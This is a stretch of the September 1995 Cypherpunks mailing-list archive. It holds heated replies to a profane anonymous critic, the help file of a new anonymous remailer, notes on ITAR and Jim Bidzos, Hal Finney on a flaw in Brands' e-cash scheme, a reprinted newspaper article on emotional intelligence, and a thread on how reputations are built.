Subject: Sigh Re: not a flame please read and think about this
In-Reply-To: <199509092006.NAA05181@jobe.shell.portal.com>
Message-ID: <199509101633.MAA11214@frankenstein.piermont.com>

anonymous-imbecile at shell.portal.com writes, among other things:
> Then shut up.

It's wonderful to see lots of anonymous remailers, but sometimes one wonders at the people that use them. I can understand, though, why many people don't have the cojones to make themselves look like hydrocephalic jerks in public.

Perry

From tcmay at got.net Sun Sep 10 09:43:35 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 10 Sep 95 09:43:35 PDT
Subject: Cypherpunks Purity Test
Message-ID:

It seems that none of us are "pure enough" for Anonymous.

In the real world, and in the world of crypto experts, programmers, and legal folks, people have real jobs. Sometimes with Microsoft, sometimes with AT&T, sometimes with the Justice Department. To exclude them from our discussions because they are not pure enough and have not done as Anonymous has (who may actually be working for anyone, of course), is self-defeating. By working for Microsoft, Justice, or TPC, they can probably do more for "the cause" (in its many dimensions and facets) than some warez-junkie living with his parents can.

Specifically,

At 2:45 AM 9/10/95, Anonymous wrote:
>wei dai patents algorithms - for microsoft!!!!. that should
>fucking help us a lot. whos he gonna sue first?

Wei Dai's work is impressive...I'm not surprised Microsoft hired him for the summer. Patents are a way of life. They may not always be, and different people have different views on them, but meaningless insults like this are a waste of our time.
>according to sci.crypt mat blaze can prove that clipper has no back
>door. right. that sure helps us. david sternlights new hero.

If Anonymous believes this claim by Sternlight, he didn't read the rest of the discussion and he knows as much about crypto as Sternlight does. Matt Blaze made a much more finely-nuanced point about this (I wasn't at the Crypto meeting, but read his comments in sci.crypt, and they directly dispute this point by Anonymous.)

>pat farrel signs up with the nsa to make the key escrow rules easier
>for us morons to understand. hey thanks. maybe theyll give you a
>nicer room in the concentration kamp.

Pat Farrell and several other members of our list attended the NIST key escrow meeting. I would have also if I lived near D.C. Is silence the only acceptable behavior at such meetings? Perhaps Anonymous feels that even _attending_ such a meeting is disgraceful? Most of us disagree.

>
>a whole shitload of socalled cypherpunks jumping over each other to help and
>defend him.

They "defended" him in the sense that they questioned the motives (and perhaps the emotional age) of Mr. Anonymous. We on this list have had a long interest in key escrow, dating back to the first weeks of this list's existence, and 6 months prior to the public disclosure of Clipper. Much discussion of key escrow in various forms (Clipper, SKE, CKE, GAK) has occurred, and even lists of changes/improvements have been made.

>brian davis trys to convinice us that key escrow isnt so bad (who signs
>your paycheck davie?????)
>

I recall Brian Davis asking a well-formed question about whether our objections to key escrow would be lessened under various circumstances. A perfectly reasonable thing to do. Several of us responded. What this list is for.

>that guy from rand corp tells us words of wisdom from robert morris the nsa guy
>as if we should write them down and pray three times a day to them.
>

??? This one escapes me. Robert Morris Sr. has written many interesting things.
That he worked for, or still works for, the NSA is no reason to ignore what he has said. Anonymous would probably be thrown into an apoplexy were he to learn that more than one current Cypherpunk actually worked for the NSA.

>carl elison designs key escrow for tis and acts like hes one of us.
>

He _is_ one of us. His work on commercial key escrow (CKE) is not inherently bad. After all, there are many legitimate reasons people and corporations would _choose_ (emphasis on "choose") to split keys, store them with trusted agents, etc. CKE, if done right, may be the way many of us protect ourselves, from loss of keys in various circumstances. Even protect ourselves from having to give keys to others (imagine offshore CKE depositories which have instructions on under what circumstances they will comply....).

I ask Anonymous, is it better that an active researcher and developer of CKE be on this list, or that we cast him out (as if we could) and continue in ignorance?

>bruce schneier is copyrighting crypt programs and
>threatining to sue people who use it.
>

Like it or not, copyrights and patents are the way things are now being done. It sometimes takes having a patent portfolio before one can "trade" with those having other patents. Long term, this will likely change (crypto anarchy and all that), but for now.... I'm not going to defend software patents, but insults like this, for someone who has worked so hard on crypto education, are uncalled for.

>even phil zimmerman is selling the rights to pgp. what about all the
>people who contributed code (like me). not a dime for us because phil is
>famous
>and your not alowed to say anythingn bad about him. sorry i forgot phil is god.
>no one dares to complain. ask phil about me and when i asked about sharing
>profits from the code i conrtibuted. also about the deal with
>r.f...

Now we know that Anonymous is actually a plant from the One Worlders! Insulting Saint Phil is too much.

>lets get back to being punks.
>fuck these traitors. do crypto and fuck the nsa.
>

Articulate words. Or, as Anonymous would put it: "fuck this noyze. get back to hacking commodore 64 warez. crypto rulez, d00d!"

Amazing what the cloak of Anonymity brings out in people. Almost enough for me to start to believe the doubters of anonymity, the skeptics. But, with good filtering (and especially with positive reputation filtering), no big deal to send Anonymous to the oblivion he so richly deserves.

I've written a lot in my time on this list, and no doubt Anonymous will find many items he thinks prove I am working for the NSA, or Chobetsu, or am an agent for the Beast. So be it.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From rwm132 at psu.edu Sun Sep 10 09:50:26 1995
From: rwm132 at psu.edu (Ryan Matlock)
Date: Sun, 10 Sep 95 09:50:26 PDT
Subject: mailing list
Message-ID: <199509101650.MAA46410@r02n06.cac.psu.edu>

can you put me and Catch 22 on your mailing list? got any good philes philes?

From perry at piermont.com Sun Sep 10 10:45:55 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 10 Sep 95 10:45:55 PDT
Subject: Bizdos citizenship?
In-Reply-To: <199509100434.VAA10595@mail.eskimo.com>
Message-ID: <199509101745.NAA11319@frankenstein.piermont.com>

Joel McNamara writes:
> In correspondence with someone outside the US regarding ITAR
> regulations, the remark was made that Jim Bizdos was Greek and not a
> U.S. citizen. Is this statement in the same class as an Elvis
> sighting? Or if it is true, what impact would ITAR have on foreign
> nationals working for a US company involved with export restricted crypto?
Yes, it's true. It's meaningless because he's a U.S. Person, and that's all that counts for the ITARs.

.pm

From perry at piermont.com Sun Sep 10 10:47:35 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 10 Sep 95 10:47:35 PDT
Subject: not a flame please read and think about this
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <199509101747.NAA11327@frankenstein.piermont.com>

Anonymous writes:
> i know this is unpopular but i wish someone would respond the the points
> rather than flaming me.

I'm afraid that you're basically an anonymous jerk and that I personally have no interest in responding to you. Post under your own name if you want more than bile.

.pm

From dcl at panix.com Sun Sep 10 12:08:56 1995
From: dcl at panix.com (David C. Lambert)
Date: Sun, 10 Sep 95 12:08:56 PDT
Subject: Precipice remailer open for business
Message-ID: <199509101908.PAA26842@panix.com>

The Precipice Remailer is now open for business!

Below, I have included the remailer-help file. You can get this file by sending a message to: mixmaster at mix.precipice.com with a subject of "remailer-help".

- David C. Lambert
dcl at panix.com
dcl at mix.precipice.com

================================================================================

This remailer supports both type II (Mixmaster) and type I (Ghio) cypherpunks messages. Help files for both are below. Both mailers have a 5 message reordering pool, with zero default latency. Posting to Usenet is not supported.

I consider the following to be inappropriate use of this anonymous remailer, and will take steps to prevent anyone from doing any of the following:

- Sending messages intended primarily to be harassing or annoying (this includes spam/velveeta);
- Use of the remailer for any illegal purpose (death threats, kiddie porn, etc).

Don't ruin this remailer for everyone by doing something stupid and/or illegal, and I won't be forced to assist the authorities in crushing you like an insect.
If you don't want to receive anonymous mail, send me a message, and I will add your email address to the block list.

You can get a list of statistics on remailer usage by sending mail to mixmaster at mix.precipice.com with Subject: remailer-stats

Have a nice day.

- David C. Lambert
dcl at mix.precipice.com

The type I PGP key is:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAypWYAAAEEAMUFk7ue4Isn2u1FMtYhJBLbSmxSgUaBgs8EJNZZYExcfTCr
V+m8o2N3pYxzbjPRAZ/pv0N1Tg93Kh17/RSzEjR/y91aaBjePv36VYKwCS8KeeX+
4LDyboic5EVkiDt1eu2cI6LIrl9w7Fo1/3YzNvsMVJ1ki/v5Ie5wAysW17oJAAUR
tBttaXhtYXN0ZXJAbWl4LnByZWNpcGljZS5jb20=
=hVLK
-----END PGP PUBLIC KEY BLOCK-----

The Mixmaster key is:

precipice mixmaster at mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1

-----Begin Mix Key-----
05fef5887ac55dfe7379d0ef4a2a0c4b
258
AATIdI/+dQ3rsvREcdYsnJkd+zQKCkPerZsyDXmX
NaYjUTwMhiHHjl/e7Zqx/mUAUQnifQfg4KpHvBGL
a6rQUTQjRhhz8sOvynyJci4NTm8DFDjYdTpvnbjp
YPu7xNhSfg7fmqXuqCan1M/AmpU1r6sF6M6gA0W4
EpOqFaJo7g32xQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

==============================
TYPE II INFO (Mixmaster 2.0.1)
==============================

This is a Mixmaster remailer. It provides an extremely high level of security. To use it, you must have a client program to produce the messages. This software is available from ftp://nately.ucsd.edu/pub/remail Read the README file for instructions. This file is export restricted, so it can not be retrieved directly.

Some information can be sent to you by the remailer by including the following commands (one per message) in the subject line of mail to the remailer.

remailer-help     This file.
remailer-stats    Usage statistics for the last 24 hours.
remailer-key      The mixmaster key file for this remailer.
A list of remailers is available from ftp://nately.ucsd.edu/pub/remail, http://nately.ucsd.edu/~loki/, and will be posted periodically to alt.privacy.anon-server and other privacy related groups.

======================
TYPE 1 INFO (Ghio 2.0)
======================

I have an automated mail handling program installed here which will take any message with the proper headers and automatically re-send it anonymously. You can use this by sending a message to mixmaster at mix.precipice.com, with the header Anon-To: containing the address that you want to send anonymously to. (Only one recipient address is permitted.) If you can't add headers to your mail, you can place two colons on the first line of your message, followed by the Anon-To line. Follow that with a blank line, and then begin your message. For Example:

> From: joe at site.com
> To: mixmaster at mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth at univ.edu
>
> This is some anonymous mail.

The above would be delivered to beth at univ.edu anonymously. All headers in the original message are removed, with the exception of the Subject (and Content-Type, if present). She would not know that it came from Joe, nor would she be able to reply to the message.

However, if Beth suspected that Joe had sent the message, she could compare the time that the message was received with the times that Joe was logged in. However, this problem can be avoided by instructing the remailer to delay the message, by using the Latent-Time header:

> From: joe at site.com
> To: mixmaster at mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth at univ.edu
> Latent-Time: +1:00
>
> This is some anonymous mail.

The above message would be delayed one hour from when it is sent. It is also possible to create a random delay by adding an r to the time (ie +1:00r), which would have the message be delivered at a random time, but not more than an hour.
Another problem is that some mailers automatically insert a signature file. Of course, this usually contains the sender's email address, and so would reveal their identity. The remailer software can be instructed to remove a signature file with the header "Cutmarks". Any line beginning with the same text as in the cutmarks header, and any lines following it will be removed.

> From: sender at origin.com
> To: mixmaster at mix.precipice.com
> Subject: Anonymous Mail
>
> ::
> Anon-To: recipient at destination.com
> Cutmarks: --
>
> This line of text will be in the anonymous message.
> --
> This line of text will not be in the anonymous message.

You can add additional headers to the output message by preceding them with ##

> From: chris at nifty.org
> To: mixmaster at mix.precipice.com
> Subject: Nifty Anon Msg
>
> ::
> Anon-To: andrew at hell.edu
>
> ##
> Reply-To: acs-314159 at chop.ucsd.edu
>
> A Message with a reply address.

By separating messages with cutmarks, you can send more than one message at once:

> From: me at mysite
> To: mixmaster at mix.precipice.com
> Subject: message 1
>
> ::
> Anon-To: recipient1 at site1.org
> Cutmarks: --
>
> Message one.
> --
> ::
> Anon-To: recipient2 at site2.org
>
> ##
> Subject: message 2
>
> Message two.

The two messages will be delivered separately.

For added security, you can encrypt your messages to the remailer with PGP. The remailer software will decrypt the message and send it on.
Here is the remailer's public key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAypWYAAAEEAMUFk7ue4Isn2u1FMtYhJBLbSmxSgUaBgs8EJNZZYExcfTCr
V+m8o2N3pYxzbjPRAZ/pv0N1Tg93Kh17/RSzEjR/y91aaBjePv36VYKwCS8KeeX+
4LDyboic5EVkiDt1eu2cI6LIrl9w7Fo1/3YzNvsMVJ1ki/v5Ie5wAysW17oJAAUR
tBttaXhtYXN0ZXJAbWl4LnByZWNpcGljZS5jb20=
=hVLK
-----END PGP PUBLIC KEY BLOCK-----

To utilize this feature, create a message with two colons on the first line, then the Anon-To line, then any other headers, such as cutmarks or latency, then a blank line, and then the message. Encrypt this with the remailer's public key. Then send it to the remailer, adding the header "Encrypted: PGP". If you forget this, the remailer won't know that it needs to be decrypted. Also be sure to use the -t option with PGP, or the linefeeds might not be handled properly.

> To: mixmaster at mix.precipice.com
> From: me at mysite.org
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
> Version: 2.6.2
>
> hIkCuMeAjnwmCTUBA+dfWcFk/fLRpm4ZM7A23iONxkOGDL6D0FyRi/r0P8+pH2gf
> HAi4+1BHUhXDCW2LfLfay5JwHBNMtcdbgXiQVXIm0cHM0zgf9hBroIM9W+B2Z07i
> 6UN3BDhiTSJBCTZUGQ7DrkltbgoyRhNTgrzQRR8FSQQXSo/cf4po0vCezKYAAABP
> smG6rgPhdtWlynKSZR6Gd2W3S/5pa+Qd+OD2nN1TWepINgjXVHrCt0kLOY6nVFNQ
> U7lPLDihXw/+PPJclxwvUeCSygmP+peB1lPrhSiAVA==
> =da+F
> -----END PGP MESSAGE-----

Any unencrypted text after the PGP message is also remailed. This is to allow sending to someone who is anonymous. If you create a PGP-encrypted message to yourself via my remailer, and then you give it to someone, they can send you a message by sending the encrypted message to the remailer. The remailer will then decrypt it and send it to you. The message gets anonymized in the process, so the sender will need to include a return address if he wants a reply.

Messages sent this way can be encrypted using the Encrypt-Key: feature. Any text following a line beginning with ** will be encrypted with this key.
For example, if you put in your PGP message:

> ::
> Anon-To: you at yourhost.org
> Encrypt-Key: your_password
>
> **

The appended message after the ** will be encrypted with the key "your_password", using PGP's conventional encryption option.

From hfinney at shell.portal.com Sun Sep 10 12:13:27 1995
From: hfinney at shell.portal.com (Hal)
Date: Sun, 10 Sep 95 12:13:27 PDT
Subject: Brand e-cash implementation?
Message-ID: <199509101912.MAA07700@jobe.shell.portal.com>

Brands has a web page at . I don't know of any implementations of his technology. The last time I heard from him was early this year and at that time he apparently was still looking for backers.

BTW he has a new paper out as of July 95, available above, which discusses some problems and attacks on some earlier papers. He had proposed a notion called "secret key certificates" in which some problems have been found. Basically a secret key certificate is just like a public key certificate (a signature by someone on a public key as in PGP) except that realistic-looking but ultimately worthless secret key certificates can be faked up (simulated) by anyone. No one can distinguish a fake secret key certificate from a real one. However, they are worthless because the faking process requires you to choose a random public key, and you can't figure out what the secret key is.

Brands has (re)expressed his digital cash technology in terms of these secret key certificates. But Berry Schoenmakers of CWI has shown a way in which a faked-up secret key certificate can be used to spend a coin which was never withdrawn. However, to do so, you have to go through the withdrawal protocol in a particular incorrect way. You force the bank to act as an "oracle" for a certain discrete log problem when you do the withdrawal. The data you get from the incorrect withdrawal protocol allows you to spend the fake coin.
So this is not actually a dangerous attack, because you in effect have to withdraw a coin in order to spend the fake one. You can't make any money from it. Still, it was not anticipated and that is a bit worrisome. I'm not sure why Brands' various proofs of correctness (which are one of the big selling points of his technology) did not anticipate this attack. (In effect this is a different form of a blind signature than what Brands planned for, since you withdraw one thing and get another. I was thinking Brands should write this up under the title "Unanticipated Blinding for Signatures", a pun on Chaum's "Blinding for Unanticipated Signatures", one of his credential papers.)

Brands has a workaround to prevent this attack, but it hurts the provability of his scheme. "A rigorous prove [sic] of the effectiveness of the measure may be hard to provide, though, since one must hereto prove that the CA cannot be used as an oracle to perform the cryptographic action in the showing protocol with respect to simulated public keys." So this may be a setback in Brands' attempts to get his thesis finished and accepted.

As for the question of whether any digital cash scheme offers "true" anonymity, I think you have to be more specific. Virtually all cash advocates will claim that they can offer this. In the debate I had earlier with Lucky Green I argued that Chaum's ecash does offer a certain kind of anonymity. The extent to which it does not is largely not technical but a product of not allowing anonymous bank accounts. With anonymous accounts Chaum's technology offers as much anonymity as any system that I have studied.

There is one technical problem with Chaum's ecash which Lucky mentioned, but I believe it applies to all systems. That is that the spender of the cash can "mark" it or at least recognize it when it is later deposited. If the spender wanted to attack the receiver of the money and it is deposited non-anonymously then this will be a problem.
However, as we discussed here several months ago, Chaum's paper "Transferred Cash Grows in Size" from a recent Crypto proceedings shows that by colluding with the bank a payor of cash can recognize it at any later stage of the payment chain. So this kind of anonymity is very hard to achieve. Chaum's paper applied to off-line cash, though, so perhaps an online system could do it. But you'd have to blind the coins twice, once when they pass from bank to payor and once when they go from payor to payee, and I don't see how to do this.

Hal Finney

From rmartin at aw.sgi.com Sun Sep 10 12:23:05 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Sun, 10 Sep 95 12:23:05 PDT
Subject: not a flame please read and think about this
In-Reply-To: <199509100245.EAA09943@utopia.hacktic.nl>
Message-ID: <9509101521.ZM13875@glacius.alias.com>

Hm. Time for agents. But here's a fairly simple test: if there are no uppercase letters in the body of the message, and no apostrophes either, it's likely from "anonymous", our favorite Thomas. After all, the other reputable nyms at least *sign* their stuff, don't they? [and PGP generally seems to use upper-case when it writes signatures]

frodo =)

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu
http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8
Shad Valley Waterloo 1992

From Andrew.Spring at ping.be Sun Sep 10 13:10:58 1995
From: Andrew.Spring at ping.be (Andrew Spring)
Date: Sun, 10 Sep 95 13:10:58 PDT
Subject: Bizdos citizenship?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> In correspondence with someone outside the US regarding ITAR regulations, the remark was made that Jim Bizdos was Greek and not a U.S. citizen. Is this statement in the same class as an Elvis sighting? Or if it is true, what impact would ITAR have on foreign nationals working for a US company involved with export restricted crypto?
>
> Please don't get carried away and turn this into a Net rumor. I'm just curious if anyone on the list can confirm or deny the citizenship comment.

Jim Bidzos is a US Permanent Resident Alien and Greek citizen. He has a Green Card. It doesn't have any ITAR impact, since the ITAR term 'Foreign Person' doesn't include Green Carded Resident Aliens. It probably wouldn't have any impact anyway, since he's a business weenie, and not a software weenie. Now, if he had a _programmer_ that wasn't a US Citizen, that would be a-whole-nother kettle of fish.

He's previously stated that he would become a US Citizen, if it were not for the fact that Greece would require him to give up his Greek (and hence his EC) citizenship. See Simson Garfinkel's book on PGP for more details.

From damion.furi at the-matrix.com Sun Sep 10 13:11:24 1995
From: damion.furi at the-matrix.com (DAMION FURI)
Date: Sun, 10 Sep 95 13:11:24 PDT
Subject: not a flame please re
In-Reply-To: <8B0D11D.000504E7BF.uuout@the-matrix.com>
Message-ID: <8B0D375.000504E8F1.uuout@the-matrix.com>

A|i know this is unpopular but i wish someone would respond the the points

You're going out of your way to be an asshole and you're surprised that you're being attacked? If you don't want to be flamed, turn off the flamethrower, shut down the bulldozer, and use a reasonable tone.

|rather than flaming me. pat farrel is the only one of you with the balz
|to try to defend himself insead of attacking me. and you attack me for
|being anon. i love it. cypherpunks yea right.

Anonymous doesn't mean anything except that you don't have the "balz" to stand up for the beliefs you're espousing.

A|wei dai patents algorithms - for microsoft!!!!.
that should
|fucking help us a lot. whos he gonna sue first?

If the patents aren't valid, they won't stick. What are you bitching about?

A|according to sci.crypt mat blaze can prove that clipper has no back
|door. right. that sure helps us. david sternlights new hero.

Maybe it doesn't. Not that it matters. The only reasonable working assumption for Clipper (or anything like it) is that it _does_ have at least one back door and that it will be abused. What's new about this? Again, what are you bitching about? Sternlight's an idiot, use your head.

A|pat farrel signs up with the nsa to make the key escrow rules easier
|for us morons to understand. hey thanks. maybe theyll give you a
|nicer room in the concentration kamp.

I'm not going to participate in an escrow no matter how easily the rules are understood. I'm not going to participate for any reason. But I can feel that way without jumping down Farrell's throat over it. After all, he's not my spokesman.

A|a whole shitload of socalled cypherpunks jumping over each other to help and
|defend him.

That's not what I saw. I saw a whole shitload of cypherpunks jumping over each other attacking you, not defending him.

A|bruce schneier is copyrighting crypt programs and
|threatening to sue people who use it.

So? His programs, his rules. If you used one of my programs without a license, I'd sue you, too.

A|even phil zimmerman is selling the rights to pgp. what about all the people w
| contributed code (like me). not a dime for us because phil is famous
|and your not allowed to say anything bad about him. sorry i forgot phil is go
|no one dares to complain. ask phil about me and when i asked about sharing
|profits from the code i contributed. also about the deal with
|r.f...

You weren't expecting money when you contributed code. What changed?

A|lets get back to being punks. fuck these traitors. do crypto and fuck the nsa

Random defiance won't get you anywhere you want to be.
:----------:----------:----------:----------:----------:----------:-----
: furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT
: 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94
PGP: When it's none of their damned business.
--- SPEED 2.00 #2640

From nobody at REPLAY.COM Sun Sep 10 15:20:25 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 15:20:25 PDT
Subject: Nice Guys
Message-ID: <199509102220.AAA25494@utopia.hacktic.nl>

NY Times, Sept. 10, 1995.

The Decline of the Nice-Guy Quotient

By Daniel Goleman

Contrary to conventional wisdom, nice guys do finish first. The trouble is, nice guys are harder and harder to find.

Amid the agonizing over standardized intelligence tests comes a new problem to worry about. Psychologists seeking a broader measure of intelligence, one that accounts for the personality traits that seem to predict success better than IQ alone, have discovered that a newly minted virtue they call "emotional intelligence" is declining as well.

A recent study done at Bell Laboratories, the high-tech think tank near Princeton, N.J., found that the most valued and productive engineers -- at least among electrical engineers working in teams of up to 150 people -- were not those with the highest IQs, the highest academic credentials or the best scores on achievement tests. Instead, the stars were those whose congeniality put them at the heart of the informal communication networks that would spring up during times of crisis or innovation.

When these likeable engineers hit a snag and E-mailed for help, they got an answer instantly; when others less gifted in interpersonal realms sent similar messages, they sometimes waited days or weeks for a reply. The standouts excelled in rapport, empathy, cooperation, persuasion and the ability to build consensus among people.
The new term for these traits is emotional intelligence, which, in addition to the social graces, includes the ability to read one's own feelings, to control one's own impulses and anger, to calm oneself down and to maintain resolve and hope in the face of setbacks. To predict the success of a financial analyst or geophysicist, IQ is still crucial. But within a pool of high-IQ people, those with high emotional intelligence will have an extra competitive edge.

Emotional intelligence, like self-knowledge and personal charisma, has long been seen as ineffable, more the stuff of poets and philosophers than psychometricians. And yet, despite all that, the measuring has begun.

In the mid-1970s, and again in the late 1980s, Thomas Achenbach, a psychologist at the University of Vermont, had thousands of American children assessed by their parents and teachers on a behavioral checklist. He found that over the course of that decade and a half, America's children, on average, had become more anxious and depressed, more impulsive and mean, more demanding and disobedient, more hot-tempered and aggressive -- and not just in beleaguered urban neighborhoods. The study found growing emotional deficits even among the children of the wealthiest suburbs. Although the scores were worst for the poorest children, the rate of decline was the same for all, privileged and impoverished alike.

Apparently, students continue to be receptive even into their teen years. Neuroscientists have found that the centers in the prefrontal lobes that control emotional impulse are among the last parts of the brain to reach full maturity, sometime in mid- to late adolescence.

Now, at last, from the emotional literacy front there is some promising news: Children in the courses show marked improvements in the ability to control their impulses, show empathy, cooperate with others, manage anger and anxiety, focus on a task, pursue goals and resolve conflicts. Delinquency, fights and drug use drop.
And there is an added bonus: achievement test scores rise too.

------

From weidai at eskimo.com Sun Sep 10 15:32:12 1995
From: weidai at eskimo.com (Wei Dai)
Date: Sun, 10 Sep 95 15:32:12 PDT
Subject: question about reputation
Message-ID:

In an economy based on positive reputations, how does one acquire a reputation capital? One way may be to initially perform services at a price below cost, but this has some problems.

For example, Alice starts an anonymous consulting service, and announces that she will answer the first ten queries for free. Upon hearing this, Mallet immediately starts another consulting service, and announces the same offer. At this point Mallet can simply forward his customers' queries to Alice and Alice's answers back to his customers. Thus, he gains reputation at no cost.

On the other hand, this "man-in-the-middle" attack can also work against conventional True Name based services, but perhaps with less effect. Has anyone ever heard of this being done?

Is there a better way to acquire a good reputation?

Wei Dai

From aba at dcs.exeter.ac.uk Sun Sep 10 15:52:51 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Sun, 10 Sep 95 15:52:51 PDT
Subject: not a flame please read and think about this
Message-ID: <20619.9509102252@exe.dcs.exeter.ac.uk>

Anon writes:

> i know this is unpopular but i wish someone would respond the the
> points rather than flaming me.

Fair enough, try these...

> wei dai patents algorithms - for microsoft!!!!. that should
> fucking help us a lot. whos he gonna sue first?

Shame it got patented, one more patent. Patents are a mess, ick!

> hey i think ill patent xor!!!! and give the patent to the nsa!!!

I was kind of wondering if it would be necessary to patent something just to ensure someone else did patent *your* idea, if you came up with one. Or can you publish, and then say that's prior art, so no one else can go patent your idea.
Otherwise it would be kind of cool for cpunks to be holding a few patents themselves, allowing free use, just to stop some "hmm lets see what we can patent this week", and "lets patent their work cos they haven't yet" types stealing stuff, and disabling a whole section of work.

Chaum's got lots of nice technology, but his patenting and $150k price tag might not be doing him favours. Unless he really does manage to pull some big banks or something. I reckon the netscape model is a good one, give stuff away to the educational lot, sell things cheap, have free demo versions, get the standard first before charging a ransom. Guess he knows what he's doing tho. I hope so for the sake of the future of anon ecash. Be a shame if some of these lame things which claim to be ecash but are really checks with full audit logs, or credit card transactions in disguise become the defacto standard. Problem is no one stands much of a chance unless a radically new method of ecash can be had, he has his patents cover blind sigs? I guess they don't cover blind sigs in general because Brands has applied for patents on his improved blinding techniques.

> according to sci.crypt mat blaze can prove that clipper has no back
> door. right. that sure helps us. david sternlights new hero.

That interpretation was argued. But it's interesting anyway, if a MKCS is equivalent to a PK, and PKs are computationally expensive, and clipper chips are cheap, well hey maybe that's what it does mean, and they wouldn't want to have a weak backdoor in the sense of a weak algorithm, as it may come to light some day, similarly eventually the thing would surely get reverse-engineered, they wouldn't want to be caught out, I'd have thought. They don't need that for a backdoor, they've already got the front door - a copy of all the keys.

> pat farrel signs up with the nsa to make the key escrow rules easier
> for us morons to understand. hey thanks. maybe theyll give you a
> nicer room in the concentration kamp.
I found it real informative to have a first hand report of what was going on. I don't see anything wrong with going along to the meeting just to throw your spanner in the works, sounds like the govt types didn't have an easy time of it. They're clearly asking for things which are unacceptable to industry, and cpunks alike. A lot of the stuff Pat wrote up about the NIST meeting sounded like the majority of the attenders were trying to convert a government request for GAK into a CKE discussion. Would be a cool switch.

> a whole shitload of socalled cypherpunks jumping over each other to
> help and defend him.

Well you did ask :-)

> brian davis tries to convince us that key escrow isnt so bad (who
> signs your paycheck davie?????)

Not sure that there was a motive attached (I could be wrong?), seemed like a provoking question to me. Got some interesting replies.

> that guy from rand corp tells us words of wisdom from robert morris
> the nsa guy as if we should write them down and pray three times a day
> to them.

I always kind of like to hear what ex-NSA types are reported as saying, it's quite fun because you never know if they are still on the payroll and feeding you a story for ulterior motives, or if they are making a statement which they think is to their advantage to scare you, or if they really are ex-NSA and are just saying what they can, being helpful, without getting in hot water with the secrecy stuff they have to agree to.

> carl elison designs key escrow for tis and acts like hes one of us.

Designs CKE, CKE is fine by me, it's voluntary, and just the software equivalent of having a spare key for your own use. GAK is the evil one.

> bruce schneier is copyrighting crypt programs and
> threatening to sue people who use it.

Let's tackle one thing at a time ok? Lots of folks would agree patents are bad news, at least the state of them in the US with idiots patenting XORed cursors, etc. Close to unanimous on GAK being evil incarnate.
Copyrights, well GPL, ILF, RMS says programs should be free. Indeed long term copyrights look like endangered species, if crypto anarchy has its say. But it's a tricky one because a lot of people make their money writing applications, and they don't want to vote themselves out of a job. If crypto anarchy long term proves copyrights to be outmoded, well the market will change.

> even phil zimmerman is selling the rights to pgp. what about all the
> people who contributed code (like me). not a dime for us because
> phil is famous and your not allowed to say anything bad about
> him. sorry i forgot phil is god. no one dares to complain. ask phil
> about me and when i asked about sharing profits from the code i
> contributed. also about the deal with r.f...

Wouldn't be much to go around if all the contributors got a share, there were lots of contributors. He's the one taking the rap anyway, and the guy who made it all possible.

> lets get back to being punks.

Cpunks write code, so lets do it! And lobby, and analyse govt policies, and educate about crypto, and attend govt run white-washes (NIST etc) to register their protest.

> fuck these traitors

Nah. Crypto anarchy and all that, it's an anarchy, you ain't going to find 2 cpunks with exact identical view points on all topics. Most of the people you complained of to my understanding have done a lot of work for the cpunk causes, as well as their implied copyright/patent crimes.

> do crypto and fuck the nsa.

Sounds cool to me. So what's the plan of action? People have different ideas, but they're all fighting for the same cause. Down with GAK, being the #1 target at the moment. Privacy from governments, scaling down of hugely bloated governments, malign cancerous growths that they are becoming these days, freedom is what it's all about.
Adam

From solman at MIT.EDU Sun Sep 10 15:57:18 1995
From: solman at MIT.EDU (solman at MIT.EDU)
Date: Sun, 10 Sep 95 15:57:18 PDT
Subject: question about reputation
In-Reply-To:
Message-ID: <9509102257.AA28992@ua.MIT.EDU>

Wei wrote:

|> In an economy based on positive reputations, how does one acquire a
|> reputation capital? One way may be to initially perform services at a
|> price below cost, but this has some problems.
|> For example, Alice starts a anonymous consulting service, and announces
|> that she will answer the first ten queries for free. Upon hearing this,
|> Mallet immediately starts another consulting service, and announces the
|> same offer. At this point Mallet can simply forward his customers'
|> queries to Alice and Alice's answers back to his customers. Thus, he gains
|> reputation at no cost.

A) There is a real cost (some combination of reputation and other capital) involved in attracting customers.

B) This is emphatically _not_ an "abuse" of reputation capital. Mallet will acquire a reputation based on the quality of the service he provides. Suppose that Bob also set up a service like Alice. Some people would go directly to Alice, some to Bob, and some to Mallet who chooses whichever of Alice and Bob offers the best deal for the customer. By choosing intelligently, Mallet could acquire a better reputation than either Alice or Bob. This would not be inaccurate. By using Mallet, (now a consulting services broker) the customers are getting a better deal. (i.e. MAX(A(x),B(x)) is greater than or equal to both A(x) and B(x)).

JWS

From rsalz at osf.org Sun Sep 10 16:04:04 1995
